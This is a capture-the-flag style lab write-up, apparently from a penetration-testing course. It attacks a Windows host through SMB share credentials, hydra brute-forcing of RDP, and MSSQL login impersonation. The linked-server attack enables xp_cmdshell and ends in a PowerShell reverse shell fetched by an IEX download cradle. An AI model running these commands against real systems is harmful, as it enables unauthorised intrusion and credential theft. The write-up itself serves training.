Attacking Common Services - Hard

Hints:

1- Utilize default credentials on a service to access files containing passwords and relevant information.

2- Conduct a brute-force attack on a service using the compromised files.

3- Gain access to a service using the obtained credentials.

4- privesc to admin (refer to the attacking database section for details).

When scanning all ports i initially used rustscan due to its speed but it's not always accurate. Therefore it's essential to run Nmap afterward to confirm the presence of any additional ports.

rustscan -a 10.129.150.169 -r 1-65535 --ulimit 5000
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.150.169:135
Open 10.129.150.169:445
Open 10.129.150.169:3389

so i used smbclient to retrieve any share files on the network

smbclient -L 10.129.203.10                                          
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Home            Disk      
        IPC$            IPC       Remote IPC

if we can access to "Home" directory

smbclient \\\\10.129.203.10\\Home
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Apr 21 17:18:21 2022
  ..                                  D        0  Thu Apr 21 17:18:21 2022
  HR                                  D        0  Thu Apr 21 16:04:39 2022
  IT                                  D        0  Thu Apr 21 16:11:44 2022
  OPS                                 D        0  Thu Apr 21 16:05:10 2022
  Projects                            D        0  Thu Apr 21 16:04:48 2022

                7706623 blocks of size 4096. 3168564 blocks available
smb: \> dir .\IT\
  .                                   D        0  Thu Apr 21 16:11:44 2022
  ..                                  D        0  Thu Apr 21 16:11:44 2022
  Fiona                               D        0  Thu Apr 21 16:11:53 2022
  John                                D        0  Thu Apr 21 17:15:09 2022
  Simon                               D        0  Thu Apr 21 17:16:07 2022

In each directory there are files containing user credentials so download them using get filename. of particular interest is the 'secrets.txt' file in John's directory which suggesting that this user is running a linked server so let's use the credentials file of "Fiona" to attempt brute-forcing RDP access.

hydra -l fiona -P ./creds.txt 10.129.150.169 rdp -vV 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-04 10:24:50
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 5 login tries (l:1/p:5), ~2 tries per task
[DATA] attacking rdp://10.129.150.169:3389/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 10.129.150.169 - login "fiona" - pass "kAkd03SA@#!" - 1 of 5 [child 0] (0/0)
[ATTEMPT] target 10.129.150.169 - login "fiona" - pass "48Ns72!bns74@S84NNNSl" - 2 of 5 [child 1] (0/0)
[ATTEMPT] target 10.129.150.169 - login "fiona" - pass "SecurePassword!" - 3 of 5 [child 2] (0/0)
[ATTEMPT] target 10.129.150.169 - login "fiona" - pass "Password123!" - 4 of 5 [child 3] (0/0)
[ATTEMPT] target 10.129.150.169 - login "fiona" - pass "SecureLocationforPasswordsd123!!" - 5 of 5 [child 0] (0/0)
[STATUS] attack finished for 10.129.150.169 (waiting for children to complete tests)
[3389][rdp] host: 10.129.150.169   login: fiona   password: 48Ns72!bns74@S84NNNSl
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-04 10:25:15

I obtained the password and now i will use it to connect to RDP using the 'rdesktop' command.

rdesktop -u fiona -p '48Ns72!bns74@S84NNNSl' 10.129.150.169
Autoselecting keyboard map 'en-us' from locale

ATTENTION! The server uses and invalid security certificate which can not be trusted for
the following identified reasons(s);

 1. Certificate issuer is not trusted by this system.

     Issuer: CN=WIN-HARD


Review the following certificate info before you trust it to be added as an exception.
If you do not trust the certificate the connection atempt will be aborted:

    Subject: CN=WIN-HARD
     Issuer: CN=WIN-HARD
 Valid From: Wed Apr  3 10:17:21 2024
         To: Thu Oct  3 10:17:21 2024

  Certificate fingerprints:

       sha1: 9f8432611764165e07c32c43f758bc5f567adf46
     sha256: c4971520cd885eda3796f17cb97817102a5dc883e162bb78427166df8437da76


Do you trust this certificate (yes/no)? yes
Failed to initialize NLA, do you have correct Kerberos TGT initialized ?

The first step i took was to check the users on the machine as you can see, i couldn't find users 'Simon' and 'John' so we won't brute force RDP again with their credentials file. In the next step i will include the listening port in the Nmap scan.

i run Nmap scan with all these ports

nmap -p135,445,1433,3389,5985,47001,49664,49665,49666,49667,49668,49669,49670,49697,139 10.129.150.169 -A -Pn -vvv 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-04 10:51 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:51
Completed NSE at 10:51, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:51
Completed NSE at 10:51, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:51
Completed NSE at 10:51, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 10:51
Completed Parallel DNS resolution of 1 host. at 10:51, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 10:51
Scanning 10.129.150.169 [15 ports]
Discovered open port 135/tcp on 10.129.150.169
Discovered open port 3389/tcp on 10.129.150.169
Discovered open port 445/tcp on 10.129.150.169
Discovered open port 1433/tcp on 10.129.150.169
Completed Connect Scan at 10:51, 7.64s elapsed (15 total ports)
Initiating Service scan at 10:51
Scanning 4 services on 10.129.150.169
Completed Service scan at 10:53, 126.22s elapsed (4 services on 1 host)
NSE: Script scanning 10.129.150.169.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:53
NSE Timing: About 99.82% done; ETC: 10:54 (0:00:00 remaining)
Completed NSE at 10:54, 40.20s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:54
Completed NSE at 10:54, 12.11s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
Nmap scan report for 10.129.150.169
Host is up, received user-set (0.98s latency).
Scanned at 2024-04-04 10:51:39 EDT for 186s

PORT      STATE    SERVICE       REASON      VERSION
135/tcp   open     msrpc         syn-ack     Microsoft Windows RPC
139/tcp   filtered netbios-ssn   no-response
445/tcp   open     microsoft-ds? syn-ack
1433/tcp  open     ms-sql-s      syn-ack     Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   10.129.150.169:1433: 
|     Target_Name: WIN-HARD
|     NetBIOS_Domain_Name: WIN-HARD
|     NetBIOS_Computer_Name: WIN-HARD
|     DNS_Domain_Name: WIN-HARD
|     DNS_Computer_Name: WIN-HARD
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-04-04T14:17:32
| Not valid after:  2054-04-04T14:17:32
| MD5:   97db:24b3:bd14:d8e0:0bab:f5dd:ba17:6b6e
| SHA-1: b43a:4ea5:3775:1a8c:979a:da67:5d8a:2d1b:b687:92fb
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQK1waeJ1O/4tGkfOjMEg4KDANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjQwNDA0MTQxNzMyWhgPMjA1NDA0MDQxNDE3MzJaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAL+C2myT
| ru+3oLBFF9C/+p1KH6/Dt0DbKI7mxBpkxKBgXT2Il8Z/qXysfWVEFzJL0ZAe0iwc
| q3pJTx1dIdF174hRifrBT/g2Dyc7f0FXH150qyoH6zzp3qpc6XQUntMyVGL8+WGC
| 6FRU3o09be+Z+TqMXCt9o4SPXqm24NRggU/VMYvPD3cJVQSS8UJJikRIAcXYXYoo
| oOqm9vYPPXk05Fgwd0IECgKcFldS1sbaYVSmfiLdzxwPQ1SA7iXheLguB0HN6/KC
| Ygs1LN+1S14eGsLtPHIPK34y2KEVWVMS6jHlny3876Z41Lg34wuIKQzmTSzGZE4q
| 8SDuQxvjGAKWbWECAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAVF/WsilzsaYAIG7+
| Xq8Ppl+qwQdl9slRc1LCOC9hN8ePRO2CEd8eJC4L3QkiYRtANiwU8NaANCO4hIgM
| QxUogemcyDp1TNUvVuEolBsjBfUDih9jwmesNjQYLzcJxHTX5kvjkzRe9+7sJ83L
| gi7xN0SjhnlhurGVNsjT9fqwAUr8ZWL72XrLSUsvWZmvFvOlMKJcihH38bjlFCO/
| Dllx8/+B/7HWsWne85w8rIsbuTzNmA2fWfA5siK4dJI5T3WQzI2k04/GQPE0Nxvz
| 6pXpDmjXNgdXvrpNuY2j1ML+vphjJ53UwDv8jsSpY0yqBVCzOVCAv3UuUi1ZFmAj
| a6oemQ==
|_-----END CERTIFICATE-----
|_ssl-date: 2024-04-04T14:55:06+00:00; +27s from scanner time.
| ms-sql-info: 
|   10.129.150.169:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
3389/tcp  open     ms-wbt-server syn-ack     Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-HARD
| Issuer: commonName=WIN-HARD
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-04-03T14:17:21
| Not valid after:  2024-10-03T14:17:21
| MD5:   7c0d:b069:8f2d:d1d9:f999:59a4:5f9b:3721
| SHA-1: 9f84:3261:1764:165e:07c3:2c43:f758:bc5f:567a:df46
| -----BEGIN CERTIFICATE-----
| MIIC1DCCAbygAwIBAgIQeRnDxYvznJlPbDoFOcll5zANBgkqhkiG9w0BAQsFADAT
| MREwDwYDVQQDEwhXSU4tSEFSRDAeFw0yNDA0MDMxNDE3MjFaFw0yNDEwMDMxNDE3
| MjFaMBMxETAPBgNVBAMTCFdJTi1IQVJEMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A
| MIIBCgKCAQEAukZe/+uTs+3QpLDa8h/NczxGPZwgoGeTIS90uNDTv9+s2oNU8TBr
| ugxMkVz0MAPVmiLe9K8MaroF3E8uB4uZ30Td4T4ZUXESw+32WWnRv1++MPiN9pqu
| PA2kMV6Ps1b8iYIEf591YgJGf/B6pjgnRa2GF9b8ndEmR5k+Lb2rP73KHRD/Q+D4
| vWgZUMc6GP9NwtjrBQA+H6UBZVPjo0limgxzrn5DEZz49zMG6xdcY6gngQ0ChhGy
| ht2CfD3fEZpJXIdWLswh20pFoOKZoQS7E46XsXsms/pE1mxNQpF9qlZs2vQjDQE6
| gOTJjCg/dDGbdFfarX9eYZvyR4Sn1pIogQIDAQABoyQwIjATBgNVHSUEDDAKBggr
| BgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQELBQADggEBAH/ehuZc/n5G
| HTqhULmAFoPTI9gGAR97yCLW9WMGERe9fXddv8FFsBmNopSW/8bL56TnkrJ7Bm5D
| K9Npgc7KXMQhNAcRUytPVpsZzVjLOMZO1GK5o5XrKYmdkvT7CELu5RszWDFXLVnO
| uPWJajPJldXmUxQm/3KnDjIe8127gdgKjkseu+8NPy5DPu9F1RzVoU3YpULhpxFo
| lHyEWgtpryjKwQ3B6wtC4EBXrOU2P7r7uqhXvBQ0SfjOyauJ7ceAxVD6vOBXeJyF
| MuBvUymzm57G1vyGIpa9ak4LaMsIv/0FSLW0dO94jlT16zY5oPrNBrCPf27zzGk9
| XcMzLaIROC0=
|_-----END CERTIFICATE-----
|_ssl-date: 2024-04-04T14:55:03+00:00; +27s from scanner time.
5985/tcp  filtered wsman         no-response
47001/tcp filtered winrm         no-response
49664/tcp filtered unknown       no-response
49665/tcp filtered unknown       no-response
49666/tcp filtered unknown       no-response
49667/tcp filtered unknown       no-response
49668/tcp filtered unknown       no-response
49669/tcp filtered unknown       no-response
49670/tcp filtered unknown       no-response
49697/tcp filtered unknown       no-response
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-04-04T14:54:31
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 26s, deviation: 0s, median: 26s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 64644/tcp): CLEAN (Timeout)
|   Check 2 (port 16127/tcp): CLEAN (Timeout)
|   Check 3 (port 9132/udp): CLEAN (Timeout)
|   Check 4 (port 26116/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 186.62 seconds

As we can see there is an MSSQL port available so let's use Fiona's credentials to connect to it.

 sqsh -S 10.129.203.10 -U '.\\fiona' -P '48Ns72!bns74@S84NNNSl' -h
sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty
1>

It worked so can we use other user credentials to brute-force MSSQL? i attempted to brute-force other users using Medusa.

medusa -h 192.168.1.128 –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql

And it did not work so let's return to our session in MSSQL and If you recall we found a file named 'information.txt' under John's directory that contained 'create a local linked server'. Let's check if there are any linked servers.

1> SELECT srvname, isremote FROM sysservers
2> go

        WINSRV02\SQLEXPRESS                                                                                                                                           
               1

        LOCAL.TEST.LINKED.SRV                                                                                                                                         
               0

So the 'LOCAL.TEST.LINKED.SRV' is a linked server and let's see if attempting to run a query remotely will work however, considering the 'impersonation' mentioned in the previous file, let's check which users we can impersonate.

1> SELECT distinct b.name
2> FROM sys.server_permissions a
3> INNER JOIN sys.server_principals b
4> ON a.grantor_principal_id = b.principal_id
5> WHERE a.permission_name = 'IMPERSONATE'
6> go

        john                                                                       

        simon

Impersonating john user

1> EXECUTE AS LOGIN = 'john'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> go

        john                                                                                                                                       
           0

It worked. Now let's verify if John is a sysadmin on that linked server.

1> select * from openquery("LOCAL.TEST.LINKED.SRV", 'SELECT is_srvrolemember(''sysadmin'')')
2> go
           1

It displayed a '1' value indicating that the John user has the 'sysadmin' role. Now let's execute SQL queries on that linked server.

1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [LOCAL.TEST.LINKED.SRV]
2> go

        WINSRV02\SQLEXPRESS                                                                                                                                           
        Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) 
        Sep 24 2019 13:48:23 
        Copyright (C) 2019 Microsoft Corporation
        Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)

                                                            
        testadmin                                                                                                                                                     
                  1

and now i executed "whoami" using "xp_cmdshell"

1> EXECUTE('xp_cmdshell ''whoami''') AT [LOCAL.TEST.LINKED.SRV];
2> go
Msg 15281, Level 16, State 1
Server 'WIN-HARD\SQLEXPRESS', Procedure 'xp_cmdshell', Line 1
SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell'
by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.

so we need to enable first "xp_cmdshell" to be able to use it and execute whoami again

1> EXECUTE('
2>  EXEC sp_configure ''show advanced options'', 1;
3>  RECONFIGURE;
4>  EXEC sp_configure ''xp_cmdshell'', 1;
5>  RECONFIGURE;
6>  EXEC xp_cmdshell ''whoami''
7> ') AT [LOCAL.TEST.LINKED.SRV];
8> go
Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.

        nt authority\system

so we can execute cmd command you can use loadfile() to read the flag but in our case we will get a shell so let's generate one with powershell and save it in "shell.ps1"

$client = New-Object System.Net.Sockets.TCPClient('10.10.16.165',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

i placed it in the same directory where we will run our Python server.

python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.203.10 - - [05/Apr/2024 06:54:11] "GET /shell.ps1 HTTP/1.1" 200 -
10.129.203.10 - - [05/Apr/2024 06:55:52] "GET /shell.ps1 HTTP/1.1" 200 -

And ran Netcat on the same port for the PowerShell reverse shell.

nc -lnvp 4444

And executed the command to download our PowerShell reverse shell and execute it directly into memory

1> EXECUTE('xp_cmdshell ''echo IEX (New-Object Net.WebClient).DownloadString("http://10.10.16.165/shell.ps1") | powershell -noprofile''') AT [LOCAL.TEST.LINKED.SRV];
2> go

And as you can see, you will get a shell on that machine

I hope you enjoyed the process! Here are some references for further information:

PreviousAttacking Common Services - Medium NextAD Enumeration & Attacks - Skills Assessment Part I

Last updated 1 year ago

Was this helpful?

rustscan -a 10.129.150.169 -r 1-65535 --ulimit 5000 .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : https://discord.gg/GFrQsGy : : https://github.com/RustScan/RustScan : -------------------------------------- Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan [~] The config file is expected to be at "/home/kali/.rustscan.toml" [~] Automatically increasing ulimit value to 5000. Open 10.129.150.169:135 Open 10.129.150.169:445 Open 10.129.150.169:3389

smbclient -L 10.129.203.10 Password for [WORKGROUP\kali]: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share Home Disk IPC$ IPC Remote IPC

smbclient \\\\10.129.203.10\\Home Password for [WORKGROUP\kali]: Try "help" to get a list of possible commands. smb: \> dir . D 0 Thu Apr 21 17:18:21 2022 .. D 0 Thu Apr 21 17:18:21 2022 HR D 0 Thu Apr 21 16:04:39 2022 IT D 0 Thu Apr 21 16:11:44 2022 OPS D 0 Thu Apr 21 16:05:10 2022 Projects D 0 Thu Apr 21 16:04:48 2022 7706623 blocks of size 4096. 3168564 blocks available smb: \> dir .\IT\ . D 0 Thu Apr 21 16:11:44 2022 .. D 0 Thu Apr 21 16:11:44 2022 Fiona D 0 Thu Apr 21 16:11:53 2022 John D 0 Thu Apr 21 17:15:09 2022 Simon D 0 Thu Apr 21 17:16:07 2022

hydra -l fiona -P ./creds.txt 10.129.150.169 rdp -vV Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-04 10:24:50 [WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover [INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections) [WARNING] the rdp module is experimental. Please test, report - and if possible, fix. [DATA] max 4 tasks per 1 server, overall 4 tasks, 5 login tries (l:1/p:5), ~2 tries per task [DATA] attacking rdp://10.129.150.169:3389/ [VERBOSE] Resolving addresses ... [VERBOSE] resolving done [ATTEMPT] target 10.129.150.169 - login "fiona" - pass "kAkd03SA@#!" - 1 of 5 [child 0] (0/0) [ATTEMPT] target 10.129.150.169 - login "fiona" - pass "48Ns72!bns74@S84NNNSl" - 2 of 5 [child 1] (0/0) [ATTEMPT] target 10.129.150.169 - login "fiona" - pass "SecurePassword!" - 3 of 5 [child 2] (0/0) [ATTEMPT] target 10.129.150.169 - login "fiona" - pass "Password123!" - 4 of 5 [child 3] (0/0) [ATTEMPT] target 10.129.150.169 - login "fiona" - pass "SecureLocationforPasswordsd123!!" - 5 of 5 [child 0] (0/0) [STATUS] attack finished for 10.129.150.169 (waiting for children to complete tests) [3389][rdp] host: 10.129.150.169 login: fiona password: 48Ns72!bns74@S84NNNSl 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-04 10:25:15

rdesktop -u fiona -p '48Ns72!bns74@S84NNNSl' 10.129.150.169 Autoselecting keyboard map 'en-us' from locale ATTENTION! The server uses and invalid security certificate which can not be trusted for the following identified reasons(s); 1. Certificate issuer is not trusted by this system. Issuer: CN=WIN-HARD Review the following certificate info before you trust it to be added as an exception. If you do not trust the certificate the connection atempt will be aborted: Subject: CN=WIN-HARD Issuer: CN=WIN-HARD Valid From: Wed Apr 3 10:17:21 2024 To: Thu Oct 3 10:17:21 2024 Certificate fingerprints: sha1: 9f8432611764165e07c32c43f758bc5f567adf46 sha256: c4971520cd885eda3796f17cb97817102a5dc883e162bb78427166df8437da76 Do you trust this certificate (yes/no)? yes Failed to initialize NLA, do you have correct Kerberos TGT initialized ?

nmap -p135,445,1433,3389,5985,47001,49664,49665,49666,49667,49668,49669,49670,49697,139 10.129.150.169 -A -Pn -vvv Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-04 10:51 EDT NSE: Loaded 156 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 10:51 Completed NSE at 10:51, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 10:51 Completed NSE at 10:51, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 10:51 Completed NSE at 10:51, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 10:51 Completed Parallel DNS resolution of 1 host. at 10:51, 0.00s elapsed DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating Connect Scan at 10:51 Scanning 10.129.150.169 [15 ports] Discovered open port 135/tcp on 10.129.150.169 Discovered open port 3389/tcp on 10.129.150.169 Discovered open port 445/tcp on 10.129.150.169 Discovered open port 1433/tcp on 10.129.150.169 Completed Connect Scan at 10:51, 7.64s elapsed (15 total ports) Initiating Service scan at 10:51 Scanning 4 services on 10.129.150.169 Completed Service scan at 10:53, 126.22s elapsed (4 services on 1 host) NSE: Script scanning 10.129.150.169. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 10:53 NSE Timing: About 99.82% done; ETC: 10:54 (0:00:00 remaining) Completed NSE at 10:54, 40.20s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 10:54 Completed NSE at 10:54, 12.11s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 10:54 Completed NSE at 10:54, 0.00s elapsed Nmap scan report for 10.129.150.169 Host is up, received user-set (0.98s latency). Scanned at 2024-04-04 10:51:39 EDT for 186s PORT STATE SERVICE REASON VERSION 135/tcp open msrpc syn-ack Microsoft Windows RPC 139/tcp filtered netbios-ssn no-response 445/tcp open microsoft-ds? syn-ack 1433/tcp open ms-sql-s syn-ack Microsoft SQL Server 2019 15.00.2000.00; RTM | ms-sql-ntlm-info: | 10.129.150.169:1433: | Target_Name: WIN-HARD | NetBIOS_Domain_Name: WIN-HARD | NetBIOS_Computer_Name: WIN-HARD | DNS_Domain_Name: WIN-HARD | DNS_Computer_Name: WIN-HARD |_ Product_Version: 10.0.17763 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Issuer: commonName=SSL_Self_Signed_Fallback | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-04-04T14:17:32 | Not valid after: 2054-04-04T14:17:32 | MD5: 97db:24b3:bd14:d8e0:0bab:f5dd:ba17:6b6e | SHA-1: b43a:4ea5:3775:1a8c:979a:da67:5d8a:2d1b:b687:92fb | -----BEGIN CERTIFICATE----- | MIIDADCCAeigAwIBAgIQK1waeJ1O/4tGkfOjMEg4KDANBgkqhkiG9w0BAQsFADA7 | MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA | bABsAGIAYQBjAGswIBcNMjQwNDA0MTQxNzMyWhgPMjA1NDA0MDQxNDE3MzJaMDsx | OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs | AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAL+C2myT | ru+3oLBFF9C/+p1KH6/Dt0DbKI7mxBpkxKBgXT2Il8Z/qXysfWVEFzJL0ZAe0iwc | q3pJTx1dIdF174hRifrBT/g2Dyc7f0FXH150qyoH6zzp3qpc6XQUntMyVGL8+WGC | 6FRU3o09be+Z+TqMXCt9o4SPXqm24NRggU/VMYvPD3cJVQSS8UJJikRIAcXYXYoo | oOqm9vYPPXk05Fgwd0IECgKcFldS1sbaYVSmfiLdzxwPQ1SA7iXheLguB0HN6/KC | Ygs1LN+1S14eGsLtPHIPK34y2KEVWVMS6jHlny3876Z41Lg34wuIKQzmTSzGZE4q | 8SDuQxvjGAKWbWECAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAVF/WsilzsaYAIG7+ | Xq8Ppl+qwQdl9slRc1LCOC9hN8ePRO2CEd8eJC4L3QkiYRtANiwU8NaANCO4hIgM | QxUogemcyDp1TNUvVuEolBsjBfUDih9jwmesNjQYLzcJxHTX5kvjkzRe9+7sJ83L | gi7xN0SjhnlhurGVNsjT9fqwAUr8ZWL72XrLSUsvWZmvFvOlMKJcihH38bjlFCO/ | Dllx8/+B/7HWsWne85w8rIsbuTzNmA2fWfA5siK4dJI5T3WQzI2k04/GQPE0Nxvz | 6pXpDmjXNgdXvrpNuY2j1ML+vphjJ53UwDv8jsSpY0yqBVCzOVCAv3UuUi1ZFmAj | a6oemQ== |_-----END CERTIFICATE----- |_ssl-date: 2024-04-04T14:55:06+00:00; +27s from scanner time. | ms-sql-info: | 10.129.150.169:1433: | Version: | name: Microsoft SQL Server 2019 RTM | number: 15.00.2000.00 | Product: Microsoft SQL Server 2019 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services | ssl-cert: Subject: commonName=WIN-HARD | Issuer: commonName=WIN-HARD | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-04-03T14:17:21 | Not valid after: 2024-10-03T14:17:21 | MD5: 7c0d:b069:8f2d:d1d9:f999:59a4:5f9b:3721 | SHA-1: 9f84:3261:1764:165e:07c3:2c43:f758:bc5f:567a:df46 | -----BEGIN CERTIFICATE----- | MIIC1DCCAbygAwIBAgIQeRnDxYvznJlPbDoFOcll5zANBgkqhkiG9w0BAQsFADAT | MREwDwYDVQQDEwhXSU4tSEFSRDAeFw0yNDA0MDMxNDE3MjFaFw0yNDEwMDMxNDE3 | MjFaMBMxETAPBgNVBAMTCFdJTi1IQVJEMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A | MIIBCgKCAQEAukZe/+uTs+3QpLDa8h/NczxGPZwgoGeTIS90uNDTv9+s2oNU8TBr | ugxMkVz0MAPVmiLe9K8MaroF3E8uB4uZ30Td4T4ZUXESw+32WWnRv1++MPiN9pqu | PA2kMV6Ps1b8iYIEf591YgJGf/B6pjgnRa2GF9b8ndEmR5k+Lb2rP73KHRD/Q+D4 | vWgZUMc6GP9NwtjrBQA+H6UBZVPjo0limgxzrn5DEZz49zMG6xdcY6gngQ0ChhGy | 